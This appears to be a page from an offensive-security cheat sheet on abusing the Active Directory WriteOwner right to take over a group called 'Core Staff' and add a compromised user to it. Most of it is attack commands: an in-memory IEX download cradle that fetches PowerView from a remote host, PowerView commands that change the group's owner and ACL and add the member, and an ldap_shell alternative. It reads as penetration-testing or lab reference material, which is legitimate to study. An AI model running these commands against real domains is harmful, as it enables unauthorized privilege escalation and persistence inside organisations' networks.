WriteOwner

Object owners retain the ability to modify object security descriptors, regardless of permissions on the object's DACL.

Assuming a user has WriteOwner on a group. We can take control of the group and then we can add ourselves or any other user we compromised, into that group. We start by looking at the bloodhound graph. For this, we have a user called JDGODD, he has WriteOwner on a group called Core Staff, we can take control of the group, using PowerView.

We start by importing PowerView. We can execute in memory by using IEX.

iex(new-object net.webclient).downloadstring('http://10.10.xxpowers.xx/PowerView.ps1')

Then we use JDGOOD's password and store the password in a variable called Creds

$SecPassword = ConvertTo-SecureString 'Password1!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\JDgodd', $SecPassword)

Now we chnage the OwnerIdentity and PrincipalIdentity of the group.

Set-DomainObjectOwner -Identity 'CORE STAFF' -OwnerIdentity JDgodd -Cred $cred
Add-DomainObjectAcl -TargetIdentity "CORE STAFF" -PrincipalIdentity JDgodd -Cred $cred -Rights All

After all, we add the user into the group.

Add-DomainGroupMember -Identity 'CORE STAFF' -Members 'JDgodd' -Cred $cred

To verify => net group 'CORE STAFF'

Alternative Method

We can use Ldap to do this, for this we use a tool called ldap_shell

ldap_shell domain.local/JDgodd:Password1 -dc-ip 10.10.xx.xx

After getting an interactive session, we can execute two commands that give us the important writes.

set_genericall "CORE STAFF" "JDGODD"
add_user_to_group "<username> OR JDGODD" "CORE STAFF"

PreviousWinrm Using Certificate[PFX]NextPowershell

Last updated 3 years ago